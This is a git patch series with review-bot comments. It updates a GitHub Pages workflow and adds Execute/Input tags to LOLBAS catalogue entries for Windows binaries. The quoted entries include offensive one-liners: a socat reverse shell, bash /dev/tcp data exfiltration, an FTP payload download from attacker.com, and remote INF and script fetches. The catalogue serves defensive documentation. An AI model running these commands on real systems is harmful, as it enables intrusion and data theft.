From 8715370aa8663be2c0964b256ac6797109a31872 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 10:51:15 +0200 Subject: [PATCH 001/148] Update gh-pages.yml --- .github/workflows/gh-pages.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index c9ce872f..b053a7c1 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -1,5 +1,5 @@ --- -name: Update LOLBAS-Project.github.io +name: Update LOLBAS-Project-hegusung.github.io on: workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] @@ -21,11 +21,11 @@ jobs: mv yml/OSScripts yml/Scripts rm -r yml/HonorableMentions - - name: Deploy to LOLBAS-Project.github.io repo + - name: Deploy to LOLBAS-Project-hegusung.github.io repo uses: peaceiris/actions-gh-pages@v3 with: deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }} - external_repository: LOLBAS-Project/LOLBAS-Project.github.io + external_repository: hegusung/LOLBAS-Project-hegusung.github.io publish_branch: master publish_dir: yml destination_dir: _lolbas From 679b321c343f15bd6ad4e0fe7010ad3dee6593e0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:00:02 +0200 Subject: [PATCH 002/148] Update gh-pages.yml --- .github/workflows/gh-pages.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index b053a7c1..d3d3f7e3 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml 
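Review bot: The second hunk repoints the deploy step at a personal repository, `hegusung/LOLBAS-Project-hegusung.github.io`, while still using the upstream secret name `ACTIONS_DEPLOY_KEY`; this is fork-local configuration, and if it travels in a pull request to the upstream project it would redirect the production GitHub Pages deploy. Consider reading the target from a repository variable, `external_repository: ${{ vars.PAGES_REPOSITORY }}`, so the same workflow file serves upstream and forks without edits. The deploy key stored under that secret name in the fork should be a write-scoped key for the fork's pages repository only, never a copy of the upstream key. The `name:` change in the first hunk is cosmetic but has the same fork-only concern.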
@@ -1,6 +1,25 @@ --- name: Update LOLBAS-Project-hegusung.github.io on: + workflow_dispatch: + inputs: + logLevel: + description: 'Log level' + required: true + default: 'warning' + type: choice + options: + - info + - warning + - debug + tags: + description: 'Test scenario tags' + required: false + type: boolean + environment: + description: 'Environment to run tests against' + type: environment + required: true workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] types: [completed] From 0795916fba11963fa8b5a77e31a2883cebc567a2 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:04:50 +0200 Subject: [PATCH 003/148] Update gh-pages.yml --- .github/workflows/gh-pages.yml | 18 ------------------ 1 file changed, 18 deletions(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index d3d3f7e3..0e3d285c 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -2,24 +2,6 @@ name: Update LOLBAS-Project-hegusung.github.io on: workflow_dispatch: - inputs: - logLevel: - description: 'Log level' - required: true - default: 'warning' - type: choice - options: - - info - - warning - - debug - tags: - description: 'Test scenario tags' - required: false - type: boolean - environment: - description: 'Environment to run tests against' - type: environment - required: true workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] types: [completed] From 56ad2e75935bcaf0b3e7cd251f4530f92671a95b Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:11:44 +0200 Subject: [PATCH 004/148] Update Installutil.yml Changed tags Execute DLL to Execute .NetDLL Added Execute: .NetEXE tag --- yml/OSBinaries/Installutil.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) 
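Review bot: None of the three new `workflow_dispatch` inputs (`logLevel`, `tags`, `environment`) is read by any step of this workflow, and `environment` is `required: true` with `type: environment`, so a manual run cannot even be started until a deployment environment exists in the repository. The block matches GitHub's documentation sample rather than this workflow's needs; a bare `workflow_dispatch:` with no `inputs:` is enough to allow manual runs. Note also that the `build` job elsewhere in this series is gated on `github.event.workflow_run.conclusion == 'success'`, which is empty on a dispatch event, so manual runs would be skipped unless that condition is extended.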
diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 40d9a442..a5868cab 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -12,7 +12,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: .NetDLL + - Execute: .NetEXE - Input: Custom Format - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. @@ -22,7 +23,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: .NetDLL + - Execute: .NetEXE - Input: Custom Format - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. From 0e177e7d6e1965abdfa69298db742bf90bc1efa0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:14:41 +0200 Subject: [PATCH 005/148] Update gh-pages.yml --- .github/workflows/gh-pages.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index 0e3d285c..b3545131 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -10,7 +10,7 @@ on: jobs: build: runs-on: ubuntu-latest - if: ${{ github.event.repository.fork == false && github.event.workflow_run.conclusion == 'success' }} + if: ${{ github.event.workflow_run.conclusion == 'success' }} steps: - uses: actions/checkout@v2 From e5731033b2f8e8d68df52bf0c37e566924c407c9 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:50:14 +0200 Subject: [PATCH 006/148] Update Addinutil.yml Tags added: - .NetObjects - Fixed Format --- yml/OSBinaries/Addinutil.yml | 3 +++ 1 file changed, 3 insertions(+) 
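Review bot: The second Installutil command in this hunk, `InstallUtil.exe https://example.com/payload`, fetches its payload from a URL, but only `.NetDLL`/`.NetEXE` tags were added; other URL-sourced entries in this series (Ieexec, Dfsvc) carry `- Execute: Remote`, so add that tag here for consistency. Also confirm that `.NetDLL` and `.NetEXE` are accepted values in the tag schema the YAML-lint workflow validates, since the replaced `DLL` value was presumably in its allowed list and a new value that is not will fail the check that gates deployment.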
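Review bot: Dropping `github.event.repository.fork == false` lets the deploy job run in any fork that defines `ACTIONS_DEPLOY_KEY`; that is fine for a personal fork but must not be merged upstream, where the guard stopped forks from pushing into the project's Pages repository. Separately, the `workflow_dispatch` trigger left in place two commits earlier can never satisfy the new condition, because `github.event.workflow_run` is undefined on a dispatch event. If manual runs are wanted, use `if: ${{ github.event_name == 'workflow_dispatch' || github.event.workflow_run.conclusion == 'success' }}`.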
diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml
index 909f7aa5..7f188467 100644
--- a/yml/OSBinaries/Addinutil.yml
+++ b/yml/OSBinaries/Addinutil.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: .NetObjets
+ - Input: Fixed Format
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
From 58d2f4c79c478ef5b179405b2c5b36118825b5b0 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 11:55:20 +0200
Subject: [PATCH 007/148] Update At.yml Added tags - Execute: EXE - Input: Custom Format
---
 yml/OSBinaries/At.yml | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml
index eb9743cc..2c1c1ed7 100644
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: Local Admin
 MitreID: T1053.002
 OperatingSystem: Windows 7 or older
+ Tags:
+ - Execute: EXE
+ - Input: Custom Format
 Full_Path:
 - Path: C:\WINDOWS\System32\At.exe
 - Path: C:\WINDOWS\SysWOW64\At.exe
From a199ff5deb761bb9a8738dd14f27aff12b7f941f Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 11:59:14 +0200
Subject: [PATCH 008/148] Update Atbroker.yml Added the following tags: - Execute: EXE - Input: Custom Format
---
 yml/OSBinaries/Atbroker.yml | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml
index dff33688..99c1efbc 100644
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
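Review bot: `- Execute: .NetObjets` is misspelled; the commit message says `.NetObjects`, and a tag value that appears nowhere else in the corpus will not group with other entries on the rendered site and may fail the schema check the lint workflow runs on `Tags`. Change it to `- Execute: .NetObjects`. Since this hunk introduces `Tags:` for the entry from scratch, it is worth checking the value against the schema's enumerated list rather than treating it as free text.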
@@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe From 6d4ac1c6806e03e880f64007a59faccdd94feddd Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:02:27 +0200 Subject: [PATCH 009/148] Update Bash.yml Added tags: - Execute: CMD - Input: Custom format --- yml/OSBinaries/Bash.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index d257f752..87d29639 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -25,6 +31,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -32,6 +41,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe 
From 31233018022bb961d3c258162a8fe80e74409d9d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:06:18 +0200 Subject: [PATCH 010/148] Update Certoc.yml Added Tags: - Input: CustomFormat --- yml/OSBinaries/Certoc.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 34b5c3f5..1698354f 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows Server 2022 Tags: - Execute: DLL + - Input: Custom Format - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 Description: Downloads text formatted files Usecase: Download scripts, webshells etc. From 654685344666dfa8461d9b5ac4b40639961c22df Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:16:28 +0200 Subject: [PATCH 011/148] Update Cmstp.yml Tags: Changed Input: INF to Execute INF for consistency Inout: Customformat added --- yml/OSBinaries/Cmstp.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 903ec737..3a91d247 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -12,7 +12,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF + - Input: Custom Format - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. 
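Review bot: Only the first Certoc entry (`Execute: DLL`) gains `Input: Custom Format`; the `certoc.exe -GetCACAPS https://...` download entry that follows in the hunk receives no `Tags:` block, and the file's diffstat (`1 +`) confirms a single insertion. Every other command touched in this series gets a tag block, so add `Tags:` with `- Input: Custom Format` to the download entry as well. Because that entry downloads rather than executes, it should not receive an `Execute:` tag.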
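Review bot: The `cmstp.exe /ni /s https://raw.githubusercontent.com/...` command in this hunk loads its INF from a URL but receives only `Execute: INF` and `Input: Custom Format`; Ieexec and Dfsvc in this same series use `- Execute: Remote` for URL-sourced payloads, so add it here too. Renaming `Input: INF` to `Execute: INF` also changes what the tag says (the artifact executed rather than the input format supplied); the commit message calls this a consistency change, so the site's tag facets and the schema presumably need the same rename, otherwise the entry silently drops out of the `Input` facet.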
@@ -21,7 +22,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Input: INF + - Execute: INF + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe From bb484e278e2b6110367069bfe4a98cf7761271d7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:19:14 +0200 Subject: [PATCH 012/148] Update Conhost.yml Execute and Input Tags added --- yml/OSBinaries/Conhost.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 2ee2b75c..c0b49723 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: c:\windows\system32\conhost.exe Detection: From 2bf4516881c9ef4c84702274d32cf9ac05ced1a1 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:26:15 +0200 Subject: [PATCH 013/148] Update Control.yml Added Execution section to Control.exe Added tags: - Input Custom Format --- yml/OSBinaries/Control.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 7f4e162a..4ebd8813 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml 
@@ -13,6 +13,17 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format + - Command: control.exe c:\windows\tasks\evil.cpl + Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) + Usecase: Use to execute code and bypass application whitelisting + Category: Execution + Privileges: User + MitreID: T1218.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe From 20ff06dd26e4fd33854b0b5ce070a0ac0bb712cb Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:33:41 +0200 Subject: [PATCH 014/148] Update Cscript.yml Tags Added Input tag --- yml/OSBinaries/Cscript.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 129672d6..3f9d3527 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe From 7642b8cd86f7ae6a3bc706af4e2917bcbcb0d5a0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:35:23 +0200 Subject: [PATCH 015/148] Update CustomShellHost.yml Tags Added Tags: - Execute EXE - Input Fixed Format --- yml/OSBinaries/CustomShellHost.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 69d11cbf..16dd0b06 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml 
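Review bot: The description of the new `control.exe c:\windows\tasks\evil.cpl` entry has an unbalanced parenthesis, `...DLL file with CPlApplet export function)`, and `Category: Execution` is not the category value the other entries in this series use (Hh uses `Category: Execute`), so the YAML-lint/schema workflow is likely to reject the entry. Suggested lines: `Description: Execute evil.cpl payload (a CPL is a DLL file exporting a CPlApplet function).` and `Category: Execute`. The surrounding entry's command line is outside this hunk, so I cannot tell whether the new example adds anything beyond it.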
@@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: From daee90f6cdfb368978c5a4708a0d589bcde46ee0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:37:51 +0200 Subject: [PATCH 016/148] Update Dfsvc.yml Tags Added Tags: - Execute ClickOnce - Execute Remote - Input Custom Format --- yml/OSBinaries/Dfsvc.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 2a1cb9d1..c52a3a6f 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -11,6 +11,10 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOnce + - Execute: Remote + - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe From 0c36af16d582e06ac7012c23a0a00c14f117924b Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:03:33 +0200 Subject: [PATCH 017/148] Update Diskshadow.yml Tags Added Tags: - Execute CMD - Input CustomFormat --- yml/OSBinaries/Diskshadow.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index 7fb9a184..a3ddba27 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1003.003 OperatingSystem: Windows server + Tags: + - Execute: CMD + - Input: Custom Format - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures 
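Review bot: In the first Diskshadow hunk the new `Execute: CMD` tag is attached to the entry whose `MitreID` is `T1003.003` (NTDS credential dumping via shadow copy), while the `exec calc.exe` entry further down carries `T1202` for the actual command execution; if the first entry is the shadow-copy dump example, `Execute: CMD` misdescribes it and only `- Input: Custom Format` applies. The command line itself is outside this hunk, so please verify against the entry's `Category` before keeping the tag.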
@@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows server + Tags: + - Execute: CMD + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe From 524ef3217365bea97f23ca8376e22284bd9e9708 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:05:06 +0200 Subject: [PATCH 018/148] Update Dnscmd.yml Tags Added Tags: - Execution: Remote - Input: Custom Format --- yml/OSBinaries/Dnscmd.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 27f0d015..f4db3af5 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -13,6 +13,8 @@ Commands: OperatingSystem: Windows server Tags: - Execute: DLL + - Execute: Remote + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe From ec76e9e49f32d56711d6f3afd9d6fb48273923d8 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:07:06 +0200 Subject: [PATCH 019/148] Update Explorer.yml Tags Added Tags: - Execute EXE - Input: Custom Format --- yml/OSBinaries/Explorer.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 829f2f89..f4885348 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. 
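Review bot: `- Execute: Remote` is used elsewhere in this series (Ieexec, Dfsvc) to mean the payload is fetched from a URL; if for Dnscmd it is meant to say the DLL is executed on a remote DNS server, the same tag now carries two different meanings and the facet becomes useless for filtering. Either document which meaning the tag has in the schema or use a distinct value such as `- Execute: Remote host` for lateral-movement style entries. The Dnscmd command line is outside this hunk, so the intent is inferred from the commit message, which itself writes the key as `Execution: Remote` rather than `Execute: Remote`.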
@@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe From 44a2e0c6e175a8476d7bf1b269c8583ca2782507 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:08:11 +0200 Subject: [PATCH 020/148] Update Extexport.yml Tags Added Tags: - Input CustomFormat --- yml/OSBinaries/Extexport.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index c75e30a1..076343aa 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe From 3db62fffdcd590389250164f270b79b4df158c0a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:11:05 +0200 Subject: [PATCH 021/148] Update Forfiles.yml Tags Added Tags: - Execute EXE - Input: Custom Format --- yml/OSBinaries/Forfiles.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 51a084c3..8b771963 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml 
@@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe From d8c1def3507e9793b91aaa5fb5f655988dd1528b Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:12:20 +0200 Subject: [PATCH 022/148] Update Fsutil.yml Tags Added Tags: Execute: EXE Input: Fixed Format --- yml/OSBinaries/Fsutil.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 63ef8591..5714d372 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -25,6 +25,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE + - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe From eb06fb5266a0ba15a7277f4123934a7685f4054d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:13:21 +0200 Subject: [PATCH 023/148] Update Ftp.yml Tags Added Tags: - Execute CMD - Input Custom Format --- yml/OSBinaries/Ftp.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 62b9a828..21ea0a6f 100644 --- a/yml/OSBinaries/Ftp.yml 
+++ b/yml/OSBinaries/Ftp.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Input: Custom Format - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. From 4e60ead5f79fe81af653f37640d9889bcb47f6d4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:15:50 +0200 Subject: [PATCH 024/148] Update Gpscript.yml Tags Added Tags: - Execute CMD - Input Fixed Format --- yml/OSBinaries/Gpscript.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index fba5f6fe..0a5b355c 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -11,6 +11,9 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Input: Fixed Format - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures @@ -18,6 +21,9 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: 